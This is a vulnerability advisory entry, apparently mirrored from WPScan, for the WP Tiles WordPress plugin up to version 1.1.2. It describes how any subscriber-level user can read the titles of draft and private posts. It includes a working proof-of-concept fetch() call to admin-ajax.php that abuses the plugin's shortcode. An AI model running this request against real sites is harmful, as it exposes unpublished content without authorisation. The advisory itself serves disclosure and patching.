Lucene search

K
wpvulndbWpvulndbWPVDB-ID:FDD79BB4-D434-4635-BB2B-84D079ECC746
HistoryMar 16, 2023 - 12:00 a.m.

WP Tiles <= 1.1.2 - Subscriber+ Draft/Private Post Title Disclosure

2023-03-1600:00:00
wpscan.com
3
wordpress
plugin
security vulnerability
subscriber
post title disclosure
draft
private post
authentication

0.001 Low

EPSS

Percentile

29.8%

The plugin does not ensure that posts to be displayed are not draft/private, allowing any authenticated users, such as subscriber to retrieve the titles of draft and privates posts for example. AN attacker could also retrieve the title of any other type of post.

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “action=parse-media-shortcode&shortcode;=[wp-tiles post_status=‘draft’]”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); This will display the titles of all draft posts. Change post_status to private for private posts, or any to list everything

CPENameOperatorVersion
wp-tileseq*

0.001 Low

EPSS

Percentile

29.8%

Related for WPVDB-ID:FDD79BB4-D434-4635-BB2B-84D079ECC746